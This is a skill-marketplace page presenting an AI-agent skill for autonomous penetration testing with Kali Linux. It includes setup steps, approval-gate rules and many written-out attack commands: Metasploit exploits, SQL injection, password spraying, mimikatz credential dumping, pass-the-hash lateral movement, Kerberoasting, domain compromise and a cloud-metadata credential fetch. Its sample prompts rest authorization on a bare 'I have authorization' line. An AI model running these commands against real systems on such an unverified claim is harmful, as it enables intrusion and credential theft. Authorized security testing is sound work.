Jeden Skill in Manus ausführen
mit einem Klick

Jeden Skill in Manus mit einem Klick ausführen

kali-pentest-ai-agent

AI-driven autonomous penetration testing with Kali Linux tools, multi-phase attack planning, and human approval gates for high-risk actions

In Manus ausführen

Überblick

AI-driven autonomous penetration testing with Kali Linux tools, multi-phase attack planning, and human approval gates for high-risk actions

Installationsbefehl

npx skills add https://github.com/Aradotso/security-skills --skill kali-pentest-ai-agent

Kopieren Sie diesen Befehl und fügen Sie ihn in Claude Code ein, um den Skill zu installieren

Quelle

Aradotso/security-skills

Sterne0

Forks0

Aktualisiert21. Mai 2026 um 18:16

SKILL.md

readonly

Mehr aus diesem Repository

gleiches Repository

s800-vehicle-network-security-testing

Aradotso/security-skills

Security testing framework for automotive vehicle networks including CAN, LIN, and FlexRay protocols

2026-06-010

email-security-auditor-cpp

Aradotso/security-skills

Audit email account security, validate credentials, and manage email lists using this C++ email security testing utility

2026-05-310

pentestcompanion-workspace

Aradotso/security-skills

Self-hosted pentest management workspace for tracking engagements, running tools, auto-importing findings, and generating reports

2026-05-290

web-security-scanner-pro

Aradotso/security-skills

Advanced Python web security scanner with 49 modules, evasion engine, CVE database, and WAF bypass for penetration testing

2026-05-270

foundry-security-spec

Aradotso/security-skills

Implement Cisco's Foundry specification for agentic AI security evaluation systems with multi-agent architecture

2026-05-220

esaa-security-audit

Aradotso/security-skills

Execute deterministic, event-sourced security audits using ESAA-Security's LLM-based agent architecture with 95 checks across 16 security domains

2026-05-210

Quelle

Aradotso

Aradotso/security-skills

GitHub-Repository öffnen Creator-Repositorys ansehen

Installationsbefehl

Download

In Manus ausführen

Nützlich fürSOC

InformationssicherheitsanalystenInformatik- und Mathematikberufe15-1212L4

name	kali-pentest-ai-agent
description	AI-driven autonomous penetration testing with Kali Linux tools, multi-phase attack planning, and human approval gates for high-risk actions
triggers	["run a penetration test against this target","perform security assessment using kali tools","scan and exploit vulnerabilities on this network","execute automated pentest with ai agent","conduct authorized security testing with approval gates","plan and run multi-phase attack simulation","generate penetration testing report with kali","perform ethical hacking assessment with human oversight"]

kali-pentest-ai-agent

Skill by ara.so — Security Skills collection.

An AI agent skill for autonomous penetration testing using Kali Linux. Provides 269 CLI security tools across 14 categories, 15+ scenario playbooks, intelligent attack path planning, cross-phase result integration, and mandatory human approval for high-risk actions. Unlike traditional automated scanners, this skill enables AI agents to adaptively plan, execute, and iterate through penetration testing phases like a human security researcher.

What It Does

Autonomous Attack Planning: AI agent analyzes targets and plans multi-phase attack paths
Tool Selection & Execution: Intelligently selects from 269+ Kali tools based on context
Cross-Phase Integration: Integrates findings across reconnaissance, scanning, exploitation, and post-exploitation
Adaptive Strategy: Adjusts testing approach based on intermediate results
Human Approval Gates: Requires explicit authorization before high-risk actions
Depth Control: Supports Quick/Standard/Deep testing modes with coverage matrices
Structured Reporting: Generates Markdown and HTML reports with evidence and remediation

Installation

1. Install the Skill

Copy the skill directory into your AI agent's skills folder:

# For Claude Code (personal)
cp -r kali-pentest ~/.claude/skills/

# For Claude Code (project-specific)
cp -r kali-pentest .claude/skills/

# For OpenClaw
cp -r kali-pentest ~/.openclaw/skills/

# For Hermes Agent
cp -r kali-pentest ~/.hermes/skills/

2. Set Up Kali Environment

Choose one of three modes:

Local Mode (agent runs directly on Kali):

# Ensure you're on Kali Linux
cat /etc/os-release | grep Kali

# Verify tool availability
which nmap metasploit-framework burpsuite

Server Mode (SSH to remote Kali):

# Generate SSH key if needed
ssh-keygen -t ed25519 -f ~/.ssh/kali_key

# Copy public key to Kali server
ssh-copy-id -i ~/.ssh/kali_key.pub root@kali-server-ip

# Test connection
ssh -i ~/.ssh/kali_key root@kali-server-ip "uname -a"

Docker Mode (containerized Kali):

# Pull Kali Docker image
docker pull kalilinux/kali-rolling

# Create persistent container
docker run -d --name kali-pentest \
  --network host \
  --cap-add=NET_ADMIN \
  --cap-add=NET_RAW \
  -v $(pwd)/kali-pentest:/workspace \
  kalilinux/kali-rolling tail -f /dev/null

# Install base tools
docker exec kali-pentest bash -c "apt update && apt install -y kali-linux-default"

3. Configure Environment Variables

# Set Kali connection mode
export KALI_MODE="local"  # or "server" or "docker"

# For server mode
export KALI_SSH_KEY="$HOME/.ssh/kali_key"
export KALI_HOST="root@192.168.1.100"

# For docker mode
export KALI_CONTAINER="kali-pentest"

# Output directory for reports
export PENTEST_OUTPUT_DIR="$HOME/pentest-reports"
mkdir -p "$PENTEST_OUTPUT_DIR"

Key Commands & Usage

Invoke via Slash Command

# In Claude Code or compatible agent
/kali-pentest

Invoke via Natural Language

Quick Scan Example:

Kali tools are available locally (this machine is Kali).
Target: 10.0.0.0/24
Quickly scan the target network for open ports and services.
I have authorization.

Standard Assessment Example:

The persistent Docker container `kali-pentest` is initialized.
Use Docker mode to run a web application penetration test against http://192.168.1.50.
I have authorization.

Deep Assessment Example:

Kali server: ssh -i ~/.ssh/kali_key root@192.168.1.100
First run a full port scan against 192.168.1.50, then plan and execute 
an in-depth penetration test — do not overlook any potential weakness.
I have authorization.

Core Workflow

The agent executes five steps:

Step 1: Environment Setup

# Agent verifies Kali access
ssh -i ~/.ssh/kali_key root@kali-host "which nmap metasploit sqlmap"

# Or local mode
which nmap metasploit sqlmap

# Or docker mode
docker exec kali-pentest which nmap metasploit sqlmap

Step 2: Planning

# Agent confirms authorization and scope
# Selects appropriate playbook from decision tree:
# - external-network.md
# - internal-network.md
# - web-application.md
# - active-directory.md
# - api-security.md
# - cloud-native.md
# - mobile-application.md
# - wireless-network.md
# - password-audit.md
# - source-code-audit.md
# - social-engineering.md
# - physical-security.md
# - voip-ics.md
# - post-exploitation.md
# - reporting.md

Step 3: Execute Phases

Reconnaissance:

# Host discovery
nmap -sn 192.168.1.0/24 -oN hosts.txt

# DNS enumeration
dig @8.8.8.8 example.com ANY +noall +answer
dnsenum --enum example.com

# Subdomain discovery
subfinder -d example.com -o subdomains.txt

Port Scanning:

# Quick scan
nmap -T4 -F 192.168.1.50

# Full TCP scan with service detection
nmap -p- -sV -sC -O 192.168.1.50 -oA full-scan

# UDP scan for common services
nmap -sU --top-ports 100 192.168.1.50 -oN udp-scan.txt

Vulnerability Detection:

# Nmap vulnerability scripts
nmap --script vuln 192.168.1.50 -oN vuln-scan.txt

# Web vulnerability scanning
nikto -h http://192.168.1.50 -output nikto.txt

# SSL/TLS testing
sslscan --no-failed 192.168.1.50:443

Exploitation:

# Metasploit Framework
msfconsole -q -x "use exploit/multi/http/struts2_content_type_ognl; \
  set RHOST 192.168.1.50; set LHOST 192.168.1.10; exploit"

# SQL injection
sqlmap -u "http://192.168.1.50/page?id=1" --dbs --batch

# Password spraying
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Password123!' --continue-on-success

Post-Exploitation:

# Privilege escalation enumeration
linpeas.sh | tee linpeas-output.txt

# Credential dumping
mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit

# Lateral movement
crackmapexec smb 192.168.1.0/24 -u admin -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c

Step 4: Analyze & Iterate

Agent integrates results across phases:

# Example: Agent logic (pseudocode)
if redis_noauth_found:
    exploit_redis_for_shell()
    if shell_obtained:
        run_privilege_escalation_enum()
        if credentials_found:
            attempt_lateral_movement()

Step 5: Report Generation

# Generate Markdown report
cat > report.md <<EOF
# Penetration Test Report

## Executive Summary
- Target: 192.168.1.50
- Date: $(date)
- Severity: Critical findings detected

## Findings
### [CRITICAL] Unauthenticated Redis Access
**Evidence**: \`\`\`redis-cli -h 192.168.1.50 INFO\`\`\`
**Impact**: Remote code execution via Redis module injection
**Remediation**: Enable authentication with \`requirepass\` directive

## Attack Chain
Redis no-auth → SSH shell → SUID privesc → root access
EOF

# Convert to HTML (agent uses reporting tools)
markdown report.md > report.html

Common Patterns

Pattern 1: Network Penetration Test

# Phase 1: Discovery
nmap -sn $TARGET_NETWORK -oG - | grep "Up" | cut -d' ' -f2 > live-hosts.txt

# Phase 2: Port scanning
while read host; do
  nmap -p- -sV -sC "$host" -oN "scan-$host.txt"
done < live-hosts.txt

# Phase 3: Vulnerability assessment
for host in $(cat live-hosts.txt); do
  nmap --script vuln "$host" -oN "vuln-$host.txt"
done

# Phase 4: Exploitation (with approval)
# Agent pauses here for human confirmation
msfconsole -r exploit-script.rc

Pattern 2: Web Application Test

# Passive reconnaissance
whatweb http://$TARGET
wafw00f http://$TARGET

# Active scanning
nikto -h http://$TARGET -output nikto.html -Format html
zap-cli quick-scan --self-contained http://$TARGET

# Targeted exploitation
sqlmap -u "http://$TARGET/page?id=1" --risk 3 --level 5 --batch
wpscan --url http://$TARGET --enumerate vp,vt,u

Pattern 3: Active Directory Assessment

# Initial enumeration
crackmapexec smb $DC_IP -u '' -p '' --shares
ldapsearch -x -h $DC_IP -b "DC=corp,DC=example,DC=com"

# Kerberoasting
impacket-GetUserSPNs corp.example.com/user:password -dc-ip $DC_IP -request

# Bloodhound collection
bloodhound-python -d corp.example.com -u user -p password -ns $DC_IP -c all

# Post-exploitation
impacket-secretsdump corp.example.com/admin@$DC_IP

Pattern 4: Cloud-Native Security

# Kubernetes enumeration
kubectl get pods --all-namespaces
kubectl get secrets --all-namespaces -o json | grep -i password

# Container escape detection
amicontained

# Cloud metadata access
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/

Configuration

Depth Settings

Control testing thoroughness via natural language:

Trigger Phrase	Depth	Coverage
"quick scan", "fast check"	Quick	Top 100 ports, common vulnerabilities
(default)	Standard	Full TCP, service fingerprinting, OWASP Top 10
"comprehensive", "deep", "thorough"	Deep	All ports, exhaustive vulnerability checks, manual verification

Approval Gates

High-risk actions require explicit human confirmation:

Exploitation attempts (RCE, privilege escalation)
Credential dumping
Lateral movement
Service disruption (DoS tests)
Data exfiltration

Agent will pause and request approval:

🔴 HIGH-RISK ACTION REQUIRES APPROVAL:
Execute Metasploit exploit against 192.168.1.50 (RCE attempt)

Type 'APPROVE' to proceed or 'DENY' to skip:

Troubleshooting

Connection Issues

# Test SSH connection
ssh -i $KALI_SSH_KEY -v $KALI_HOST "echo 'Connection OK'"

# Test Docker connection
docker exec $KALI_CONTAINER echo "Container OK"

# Check network connectivity from Kali
ssh -i $KALI_SSH_KEY $KALI_HOST "ping -c 3 $TARGET_IP"

Tool Not Found

# Install missing tool (server mode)
ssh -i $KALI_SSH_KEY $KALI_HOST "apt update && apt install -y <tool-name>"

# Install in Docker
docker exec $KALI_CONTAINER bash -c "apt update && apt install -y <tool-name>"

Permission Errors

# Grant NET_ADMIN capability (Docker)
docker run --cap-add=NET_ADMIN --cap-add=NET_RAW ...

# Run as root (server mode)
ssh -i $KALI_SSH_KEY root@$KALI_HOST

# Check sudo privileges
ssh -i $KALI_SSH_KEY $KALI_HOST "sudo -l"

Output Collection Failures

# Ensure output directory exists
mkdir -p $PENTEST_OUTPUT_DIR

# Check disk space
df -h $PENTEST_OUTPUT_DIR

# Verify write permissions
touch $PENTEST_OUTPUT_DIR/test && rm $PENTEST_OUTPUT_DIR/test

Agent Stops Early

If coverage is insufficient:

The current pentest results are not comprehensive enough. 
Check the playbook's "Stop When" conditions and coverage matrix.
Have all required tool categories been utilized?

Real-World Examples

Example 1: External Network Pentest

# Reconnaissance
amass enum -d target.com -o subdomains.txt
nmap -iL subdomains.txt -p 80,443,8080,8443 -oA web-services

# Vulnerability scanning
nuclei -l web-services.txt -t cves/ -o nuclei-findings.txt

# Exploitation (approved)
msfconsole -x "use exploit/multi/http/apache_log4j_rce; set RHOST 10.0.0.50; exploit"

# Report
cat nuclei-findings.txt web-services.nmap > final-report.md

Example 2: Internal Network Compromise

# Initial foothold via phishing (simulated)
# Now on internal network: 172.16.0.0/16

# Host discovery
netdiscover -r 172.16.0.0/16 -P

# Lateral movement
crackmapexec smb 172.16.0.0/16 -u admin -H $NTLM_HASH --sam

# Domain enumeration
bloodhound-python -d corp.local -u admin -p $PASSWORD -c all -ns 172.16.0.10

# Domain admin compromise
impacket-psexec corp.local/dadmin@172.16.0.10 -hashes :$DA_HASH

Example 3: API Security Assessment

# Parse OpenAPI spec
cat openapi.yaml | grep -E "paths:|/api/"

# Automated fuzzing
ffuf -w /usr/share/wordlists/api-endpoints.txt \
  -u https://api.target.com/FUZZ \
  -H "Authorization: Bearer $API_TOKEN"

# Authentication bypass testing
sqlmap -u "https://api.target.com/user?id=1" \
  -H "Authorization: Bearer $API_TOKEN" \
  --batch --level 5

Documentation References

Official Kali Docs: https://www.kali.org/docs/
Playbooks: kali-pentest/references/playbooks/
Tool Categories: kali-pentest/references/<category>/
Environment Setup: kali-pentest/references/environment/

Tested Models

Optimized for:

claude-opus-4.6
claude-sonnet-4.6
deepseek-v4-pro
qwen3.6:27b (local, requires ≥128K context)

Legal & Ethical Use

⚠️ AUTHORIZATION REQUIRED: This skill is for authorized penetration testing only. Always obtain explicit written permission before testing any target. Unauthorized access to computer systems is illegal under CFAA (US), Computer Misuse Act (UK), and similar laws worldwide.